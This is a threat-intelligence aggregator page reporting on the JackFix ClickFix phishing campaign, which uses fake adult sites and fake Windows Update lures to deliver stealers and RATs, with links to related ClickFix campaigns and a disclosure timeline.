Find notable cyber news and cases, enriched with sources, timelines, and signals.
Home Browse News Feed Stats Watchlists Beta About Contact

JackFix ClickFix fake-adult-site phishing campaign

Campaign
First reported
Last updated
Happening score
H score 38
1 unique sources, 1 articles

Summary

Hide ▲

The JackFix campaign is using fake adult websites and ClickFix lures to trick users into running malicious commands, enabling an infection chain that can drop stealers and RATs. The operation disguises itself as a critical Windows security update and uses malvertising and other social-engineering routes to reach victims. Once users comply, the chain can launch mshta.exe and PowerShell stages that fetch additional payloads and evade analysis.

Related Happenings

Vidar Stealer ClickFix campaign targeting multiple sectors

Campaign
First: 08.05.2026 14:00 Last: 08.05.2026 14:00 Sources 1

About this happening: The **Vidar Stealer** campaign is using **ClickFix** social engineering and compromised **WordPress** sites to deliver password-stealing malware, widening risk for **infrastructur...

Open Happening

Venom Stealer MaaS continuous credential theft and exfiltration

Malware Activity
First: 01.04.2026 16:30 Last: 01.04.2026 16:30 Sources 1

About this happening: The **Venom Stealer** **malware-as-a-service** platform has been identified as a **credential-theft** threat that keeps exfiltrating data after infection, extending the window for...

Open Happening

Compromised legitimate WordPress websites used to infect visitors with infostealer malware campaign expands across multiple victims

Campaign
First: 11.03.2026 16:45 Last: 11.03.2026 16:45 Sources 1

About this happening: A **global ClickFix campaign** is abusing compromised **WordPress** sites to push **infostealer malware** to visitors, putting credentials and financial data at risk. The operatio...

Open Happening

MIMICRAT (aka AstarionRAT) ClickFix-delivered RAT activity

Malware Activity
First: 20.02.2026 13:55 Last: 20.02.2026 13:55 Sources 1

About this happening: The **MIMICRAT (aka AstarionRAT)** malware has been disclosed as a **ClickFix-delivered RAT** that enables **Windows token impersonation** and **SOCKS5 tunneling**, increasing the...

Open Happening

ClickFix DNS-based nslookup staging campaign

Campaign
First: 15.02.2026 16:10 Last: 15.02.2026 16:10 Sources 1

About this happening: The **ClickFix** campaign has added **DNS-based staging** that uses **nslookup** in the **Windows Run dialog** to fetch and run a second-stage payload, making malicious execution...

Open Happening

Timeline

  1. 25.11.2025 16:18 2 articles · 6mo ago

    JackFix ClickFix fake adult site campaign disclosed

    Initial Disclosure

    Cybersecurity researchers identified JackFix as a ClickFix campaign that uses fake adult websites and phony Windows Update full-screen lures to trick users into running mshta.exe commands that fetch PowerShell payloads. The chain uses obfuscation and anti-analysis measures, can elevate privileges with Start-Process and "-Verb RunAs", creates Microsoft Defender Antivirus exclusions, and can deliver loaders and RATs including Rhadamanthys Stealer, Vidar Stealer 2.0, RedLine Stealer, Amadey, and other payloads. A related Huntress-described chain also uses a ClickFix lure masquerading as Windows Update and steganography to hide shellcode in an embedded PNG, enabling Lumma or Rhadamanthys delivery.

    Show sources
    Open in new tab